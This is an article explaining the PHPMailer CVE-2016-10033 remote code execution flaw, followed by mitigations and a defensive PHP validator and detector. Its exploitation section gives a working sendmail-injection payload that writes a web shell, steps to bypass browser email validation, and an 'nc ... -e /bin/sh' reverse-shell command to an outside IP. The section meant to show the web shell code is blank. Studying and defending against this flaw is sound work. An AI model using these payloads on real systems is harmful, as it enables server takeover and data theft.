CVE-2016-10033: PHPMailer Remote Code Execution (RCE)

CVE-2016-10033 is a critical Remote Code Execution (RCE) vulnerability in PHPMailer, a widely used open-source library for sending emails in PHP applications. The flaw allows an attacker to inject malicious arguments into the mail() function call by exploiting improper input sanitization in the Sender parameter. This can lead to full system compromise if the web server is running in an unpatched configuration.

Vulnerability Overview

PHPMailer uses the PHP mail() function on Unix-based systems, which internally invokes the sendmail binary. When user-supplied email addresses are not properly sanitized, an attacker can inject additional command-line arguments into the sendmail call.

The vulnerability specifically arises when the Sender property (often populated from user input such as a "From" field) is passed to the mail() function as the -f<sender> argument in its additional parameters without escaping special characters such as quotes and backslashes, so the value reaches the sendmail command line intact.

Exploitation: Gaining Remote Code Execution

The exploit involves crafting a malicious email address that includes command-line arguments to manipulate the sendmail binary. One of the most effective payloads uses sendmail's -o (option) and -X (log file) flags to:

  • -oQ: Set a sendmail configuration option, in this case the queue directory (the page's payload uses -oQ/tmp/).
  • -X: Log the full mail transaction to a specified file, which can be used to write a PHP web shell into the web root.

Malicious Email Payload:

"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/html/shell.php  root"@127.0.0.1

This payload:

  • Escapes the opening quote in the email address.
  • Injects -oQ/tmp/ to set the queue directory (required for syntax).
  • Uses -X/var/www/html/shell.php to log the full SMTP transaction (including the email body) into a file in the web-accessible directory.
  • Appends a fake domain to maintain valid syntax.

Bypassing Client-Side Validation

Many forms use HTML5 validation (e.g., type="email") to restrict input format. To bypass this:

  1. Open browser developer tools (F12).
  2. Locate the email input field in the DOM.
  3. Change the type attribute from email to text.
  4. Enter the malicious payload.

This allows submission of syntactically invalid email addresses that would otherwise be blocked by the browser. Client-side validation is only a usability aid; the server must validate the value independently.

Delivering the Payload

Include a simple PHP web shell in the message body or subject line:

When the email is sent via PHPMailer, the entire SMTP transaction - including this payload - will be logged to /var/www/html/shell.php due to the -X argument.

Executing Commands on the Server

Once the log file is created and contains the PHP code, access it through the web browser:

http://vulnerable/shell.php?cmd=uname

This will execute the uname command on the server and return the output. You can now run any system command:

  • id – Get current user.
  • whoami – Confirm execution context.
  • nc 192.168.159.1 443 -e /bin/sh – Spawn a reverse shell.

Impact

Successful exploitation leads to:

  • Full remote code execution on the web server.
  • Access to databases, configuration files, and application secrets.
  • Potential privilege escalation and lateral movement.
  • Website defacement or use as a pivot point for internal network attacks.

Since PHPMailer is used in popular platforms like WordPress (via plugins), Drupal, and custom PHP apps, this vulnerability has widespread impact.

Mitigation and Remediation

Immediate Actions:

  • Upgrade PHPMailer: Update to version 5.2.20 or later, where this vulnerability is patched.
  • Use SMTP instead of mail(): Configure PHPMailer to use SMTP authentication rather than the mail() function to avoid invoking sendmail directly.
  • Input Validation: Sanitize all user-supplied email addresses using filter_var($email, FILTER_VALIDATE_EMAIL).
  • Disable Dangerous Functions: Disable mail() or exec() functions in php.ini if not required.

Long-Term Security Best Practices:

  • Avoid using user input in email headers unless strictly necessary.
  • Run web servers with minimal privileges (e.g., not as root).
  • Monitor logs for suspicious patterns like -X, -O, or shell commands in email fields.
  • Deploy a Web Application Firewall (WAF) to detect and block such injection attempts.
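As an added example (not code from PHPMailer or from this article), the following PHP applies two of the points above: a strict gate that rejects any address that would need a quoted local part before it is assigned to PHPMailer's Sender, combined with the filter_var check, and a scanner that flags the -X / -o option indicators mentioned under monitoring. The function names and the sample values are assumptions made here.

```php
<?php
// Added example (not PHPMailer's or the article's own code): two defensive
// checks for the CVE-2016-10033 pattern. The first gates an address before it
// is assigned to PHPMailer's Sender/From; the second flags sendmail-style
// option injection in logged form fields, as suggested under monitoring.

// A quoted local part is what the exploit needs to smuggle quotes, backslashes
// and spaces into the -f argument. Such local parts are RFC-valid and pass
// grammar-based validators (including the one PHPMailer used at the time),
// so reject those characters outright, then apply the format check.
function isSafeSenderAddress(string $address): bool
{
    if (preg_match('/[\s"\'\\\\<>]/', $address) === 1) {
        return false;
    }
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

// Detection: an escaped double quote, or whitespace followed by a token that
// looks like a sendmail option (-X, -O, or -o plus an option letter).
function looksLikeSendmailInjection(string $value): bool
{
    return preg_match('/\\\\"|\s-(?:X|O|o[A-Za-z])\S*/', $value) === 1;
}

// Constructed sample submissions (hypothetical values, not from a real log).
$samples = [
    'alice@example.com',
    '"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/html/shell.php  root"@127.0.0.1',
    'bob@example.com -Xnotes',
];
foreach ($samples as $value) {
    printf(
        "%-75s safe=%s injection=%s\n",
        $value,
        isSafeSenderAddress($value) ? 'yes' : 'no',
        looksLikeSendmailInjection($value) ? 'yes' : 'no'
    );
}
```

Only the first sample passes the gate; the article's payload is rejected by the character check and flagged by the scanner, which is the signal to alert on.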

Published on Aug 21, 2025